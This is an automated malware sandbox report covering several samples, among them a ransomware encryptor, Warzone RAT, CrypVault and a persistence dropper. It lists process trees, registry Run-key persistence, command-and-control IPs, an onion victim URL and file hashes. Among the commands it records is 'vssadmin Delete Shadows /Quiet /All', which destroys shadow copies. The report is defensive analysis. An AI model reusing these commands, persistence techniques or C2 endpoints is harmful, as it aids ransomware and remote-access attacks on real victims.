PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2316 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2608 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2668 wrote to memory of 396 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe

"C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://kqd2eml2kjib53oe.onion.link/vict?cust=9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581&guid=bf99bef1-312f-4726-8597-70228ef05e99

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /Quiet /All

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 kqd2eml2kjib53oe.onion.link udp
AU 103.198.0.111:80 kqd2eml2kjib53oe.onion.link tcp
AU 103.198.0.111:80 kqd2eml2kjib53oe.onion.link tcp
AU 103.198.0.111:80 kqd2eml2kjib53oe.onion.link tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2316-0-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-102-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-958-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-2803-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-3993-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Program Files\Common Files\Microsoft Shared\ink\readme_liesmich_encryptor_raas.txt

MD5 e05a483e9a949fcda524cb8b4ab8ba36
SHA1 398774b20f4b26c51088d552dcceeaea55302be0
SHA256 f07bdef5a164e4484c0a3d9315bf94792503543877863ea0e57e955f9d9dae9d
SHA512 d52bde031c3f7926afe042c85596246789b5817fde835f6309c5b5874477b109cd4d976209c28d469285a2b99b6ae5a0e4a3d6dc7ef2eee69e7dd1a579458368

memory/2316-4367-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-4599-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabAA92.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarAB72.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 722d8f52a4f387cffee97f9b2160b05b
SHA1 f189a57167e9e526f1619b71f7cb77a730b3ee2c
SHA256 0cf31829390341fb0704d4a74c47c7ed47c3ed9e32045198644339670121481f
SHA512 9ffeeb065e46817e3571c7a3f1828f4a3decae320bf68ce7d8a81888c2709244a6092571edcda6e160dca57566f953adf757280914c63fb56f0f203287522f9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6fc1ae52fbbb2c8c363f8d98ef668647
SHA1 650cfe49244ef95b44c6ae698d229a263e339dd5
SHA256 ee471558df686d0a06ea8c7be012d16232d138e7ca02943c7b4b0c86ad94b61f
SHA512 3a020d17b21e182a121ad141768b4961df096824da860749ed908a005e8d0e88f3b308bf0cf45b521cf846a263d45553b539d20d144b0b0d88eab834841e2edd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a9bb4e1022c6fab16712f6fa74b50cca
SHA1 161f9f2f8f3c02ab0ded0578e753c3cff697a501
SHA256 ceca9d7d481cbd7120f5f950d94e93a2c62f584b86fdaf0b30fdd5266b1e49b1
SHA512 b4c34097773507ef2c1748dc30bc34fd4f88b2ab5cd5eabef035f30efad20425ec5e4a1f6c79ac1a9d84c8a7f0e978e214c96a5064d4291a2b618a4076043092

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f69932549e545781bd413734ad00274a
SHA1 cd118e066b5e670543775521c8eded8bd4492ee8
SHA256 ba21c33595f78922828ddb7af0dd05a201641a78b8d6a8e9e1bd4f6dc8c741b0
SHA512 a3e0b7f8899374a018ae6a3b770d70c1f360dd31342bb1fc9208e1845fd47eca55666e16a0472d91935afca2b050fa5ffaa25832319681e0c364087a3a56fbc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d7ff920e2974c03510e1c981e82e6a44
SHA1 27385d20adf2648d5a25d450cca5f25e956ab51e
SHA256 f24d861298a887b29221de776b2fc8528e8fcbfa05615619035d8df861c29bd9
SHA512 2f7b4eac34143035cca48ade0eded400d2d652f9f7514eadae7aacda2fb48d5ff278fe3d5991b8053d71040e25c9a188d3181825e31edf6faa5e972c375e6d36

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5db9f6e33202891d538aa1a6f13319a2
SHA1 8d76049503f9e665f0c2fc261af1cd0b1d74386d
SHA256 e1ff9df5fdc2cc5bfffc19c567a4a213adb8c7380cbb3b329c9434ea06c012d8
SHA512 2c395a21039af442672f4cb797506f9ac3799aafca8d159c961fcd08f6987eb7993553e4a288fa282cd1df5ce3109576cd101fc8185c1cc9d665cb3c27dbaa80

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 470f737a652430a6b499b4aa1a2bcd5b
SHA1 fd85578f0c3b7bab81f28c462287fdccba1d7c48
SHA256 db273bf642c98eb0f549bc7921db0a1a0ce465328c6a86166f022d55c3dfab51
SHA512 b50948ab52e084f3e45286700d396cc45d86f27e026c4ad93de75d864bd98d9ff60ac4d1b3210dec2d9f3ccfb79be38cf2954aba41bdc90d732881a4ca604233

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d6263f9671e5146a1225d0fcb6d0c116
SHA1 3ca9f2d3a715f88ee2012595ae4b2a7ce20d6017
SHA256 91ff2a1ad88644c39c095c8bbbb590926bb3ba61ccf3b09b77a5ab4af8a99d6d
SHA512 bcc2457f2af69911ff22727779ca3d02e1995d57be6b648f1e527c56e59bb983628a827548345263da94588f863372d3eb785445f2f80ab6564e66757b78676e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bfe5ef9cb9b115683ed54e7b697be95
SHA1 41b3a4ac5e2ff6547d672d910c002286182372ac
SHA256 ed9e20a48dad20c11b5eb4d9d7f9e9e92dabddb7e188862632eb9b71de1cdd9e
SHA512 da483262952c4e9d35127403c789d7b85bf1ae86647e8d13d60d35e6949b69fef75f64671cab1e5a33f1d26390660326917371429d5bfaf217cccbbffd6375f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 77d1b6ab9dce7d443094cc749fee6f97
SHA1 e5f1880a8f466c195d196ffcba9d00011f1b60e7
SHA256 d8dff5350b9e67b3e52da6304d6fe554ebf6bc64a3d2c25e2bceb1160b2d8bed
SHA512 d63411252f9352bab679923a3b2011db31ce5986e7493f171ed0a4d9df9d650c440558d988fe51dd1e2aa45e147f063cc4099659ec7620749cccd5ffdb3ebe64

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3e32e99ae25948d82cdcd10ab15569df
SHA1 7b96e8efc1a454df23d043ec20845e2cff8abadc
SHA256 4533ef6c0cc26448652639ab8ad49f4b4498f99ae4eeba454d164a5374aa074f
SHA512 d5a246fb1e1eea70bac98c01ce69a2027281a1808e07899612697f08f3d5473133dad065fb6d1cf0f78d7e8347167bef5c0fc0754b7b9355b988b1a7411815b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 92bf9d0b6bca10cf752525ef93d8d87c
SHA1 00aacb366be444ee497f0a9210eeed94451f5c63
SHA256 9fa877b733ba1a902d4506a3c24e41cab643e52a3f6092376326ced353b084c2
SHA512 27251121954342b9ef57c72c3f15f555a24261948fbed343e168d7e0a7af3c3c51ffb1510b782c4634daf13353daa2e44df1e97ad2f83e894d5704db1666f50a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ca4f35a4712ac405bafe29808643639
SHA1 550515683e94a438bb6ea20250f0e16ad863634d
SHA256 c474fb59c5839b0cdb4b68bfded7be5593c8b99f7aca6590b719d58d61077b98
SHA512 040c1227e59607ee6c840f9e2e72b55414175b20adf5b3224a52241fd4c75e573cf5c8d713ecfff58ea97edef4f2a4399a923e3a3c7d0199e109e1b4d654b773

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56f883c112e675626203815b82c6218a
SHA1 433764258ae1f57bc19029c6b790f7316b19901f
SHA256 a012619a1675a072145ad30714990a2b60910e4a2a6aedfc1240ac4f1dbb8490
SHA512 1952b191e5eff3246d7761ac91f5c00d1ab97243629b3e7c558508a7cd0d0ea9b9f74fc95b08ce5a308b3d0c0e964762ce899e2b58e8463e4dbb7cfc43e18a8f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ac274f84763e4dfc8b703a4eb92f441
SHA1 07f62a694c54e8b58db4b1c2821b20894867ed13
SHA256 5a73d962e4af6e847b0502c5e1d64f7e22e44daa9f5becbe8512e3a56ed6ac6a
SHA512 4c5b8260a2c1ba0a200137f88f7305ef65d22cf3c8094d1191484deb6562f702a498942e2487446d0a8d298afc76515638e019420d66e2479990e9b0ba4c6a0b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 06ef914198d488c0bcbabc0fa4e583a1
SHA1 e4356386f1cd0ad51d63d33ef542ab3d0649183f
SHA256 386ba1cd756f1ea15e922eafe942ce8f7a7ac97029e5383b52f6c7443a30be18
SHA512 a020c2efefb1ba69dc83011dc21792dbbd8d34b64bb71ed2eae8b3e3506823b82223594d9ae1ab54ef6527671257a0df65206892cca0cf77d0d38ce73727e809

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab6d5d0bf6ca4de7dc7a682658c85235
SHA1 9e9eb41b09fd7d94812329bccbc2f04f48335d56
SHA256 5e2f0983036eb515f7d746c73e72c076f6172adfcf9966f88f9a22c77d93f045
SHA512 4845f055cf76f801f9fc6d5eb09367b039779b0038745b9308ebf929b318d8816b8b23093857ae1b311af104a07b511ddefa5f6e5e2a8a8652ee384b0f3b3628

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1d052f68eb2ab3ca932377e0e72252ca
SHA1 5cdb94ac70b777270b56babfd5614e419d701904
SHA256 5ad6018e97eda29eaa6c4299ace648baa1b1084039dc5a44a5acde2de781145f
SHA512 b01b49389601d5e3094d5b9d40d7d2753e9d9bf2fd18f548c66d86dbdb0223a2ce5d7e4f6159a88ba1cd89de4ce1e42ceb2a9c2db23dcd7341360f6298c84536

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 16c5e5ab90e4981c78b4aa148e4fa770
SHA1 813fd4d48d7a18003f822fd4b623ae9d6c7b9c67
SHA256 e396507ae838844433c0ef57a962df27ecedd3730695830013784acf689422d0
SHA512 8aacc92db3118d4963d7a6859cda7ffd8a3ad7fc754e0c6619171cf365927c4f3b9db8a2ecf1d774a44cc8bf37fc7319fa602f44225b73b82a94b5db6af28fa5

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241010-en

Max time kernel

363s

Max time network

368s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f213e54c8520e7458751020edf15a5ea.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f213e54c8520e7458751020edf15a5ea.exe

"C:\Users\Admin\AppData\Local\Temp\f213e54c8520e7458751020edf15a5ea.exe"

Network

N/A

Files

memory/2864-0-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

memory/2864-1-0x0000000000970000-0x00000000009AA000-memory.dmp

memory/2864-2-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2864-3-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2864-4-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2864-5-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

memory/2864-6-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241023-en

Max time kernel

591s

Max time network

593s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe"

Signatures

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\images.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\images.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A
N/A N/A C:\ProgramData\images.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe

"C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe"

C:\ProgramData\images.exe

"C:\ProgramData\images.exe"

Network

Country Destination Domain Proto
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp

Files

memory/2104-0-0x0000000001F20000-0x0000000001F5C000-memory.dmp

memory/2104-1-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-2-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-3-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-4-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-6-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-5-0x0000000001F20000-0x0000000001F5C000-memory.dmp

memory/2104-7-0x0000000000400000-0x0000000000483000-memory.dmp

\ProgramData\images.exe

MD5 f2c8eee2cd88b834e9d4c0eb4930f03f
SHA1 a47b40f642bb78757b2de40344f555dc48a5a12f
SHA256 0cc95d376267ae78c309fd5f60f3083670b1c2616b6e3e2eec8810fa273c24be
SHA512 3be3760ff7b308017d820307af224bff1c5d49ae3ea71062792816477b071af9cb106e5f2ec970da022b7a055010b91b47d57e571e18643f808787538386831d

memory/2104-13-0x0000000000400000-0x0000000000483000-memory.dmp

memory/2836-14-0x0000000000290000-0x00000000002CC000-memory.dmp

memory/2836-15-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-16-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-17-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-18-0x0000000000400000-0x0000000000483000-memory.dmp

memory/2836-19-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-20-0x0000000000400000-0x0000000000483000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:06

Platform

win7-20240903-en

Max time kernel

52s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe

"C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe"

C:\Users\Admin\AppData\Roaming\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DirectX.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c aaa.bat

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im DUMP_00A10000-00A1D000.exe.ViR.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 tangotangocash.com udp

Files

memory/800-0-0x0000000000400000-0x0000000000419000-memory.dmp

\Users\Admin\AppData\Roaming\DirectX.exe

MD5 6152709e741c4d5a5d793d35817b4c3d
SHA1 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e
SHA256 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2
SHA512 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390

memory/2676-11-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aaa.bat

MD5 3e59a76bf84cb9d1a8585c17cda9b949
SHA1 60fdb9e6bf1154aad3a332ad5657a9d62a5be73a
SHA256 21060b57f9392d62259c274427c4bb6caf19b228716d691f44a26958b3620d5f
SHA512 01bd3726c30e304dd712d302a9081052b50a85a28c586458b691e748b1867e85fa679e58db304793a18f554b8a8c17af00bd38e795d3fdb6b0f5a873f80b5303

memory/800-21-0x0000000000400000-0x0000000000419000-memory.dmp

memory/2676-24-0x0000000000400000-0x0000000000419000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241010-en

Max time kernel

362s

Max time network

368s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe"

Signatures

CrypVault

ransomware crypvault

Crypvault family

crypvault

Pony family

pony

Pony,Fareit

rat spyware stealer pony

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta C:\Windows\SysWOW64\svchost.exe N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\svchost.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\svchost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
